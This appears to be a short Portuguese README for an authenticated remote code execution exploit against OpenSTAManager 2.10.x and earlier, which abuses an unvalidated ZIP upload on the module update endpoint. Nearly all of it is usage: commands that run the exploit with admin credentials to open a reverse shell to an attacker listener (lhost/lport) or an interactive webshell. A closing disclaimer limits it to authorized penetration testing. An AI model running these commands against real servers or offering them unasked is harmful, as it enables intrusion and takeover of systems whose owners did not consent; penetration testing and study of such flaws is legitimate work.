
Exploit de execução remota de código autenticado para OpenSTAManager via upload de ZIP não validado. Suporta modos de shell reverso e webshell interativo para testes de penetração.
RCE autenticado via upload de ZIP não validado no endpoint de atualização de módulo.
Afetado: OpenSTAManager <= 2.10.x
pip install requests
# Reverse shell (Penelope or any listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444
# Interactive webshell
python3 exploit.py -u http://TARGET -U admin -P admin --interactive
Apenas para testes de penetração autorizados e fins educacionais.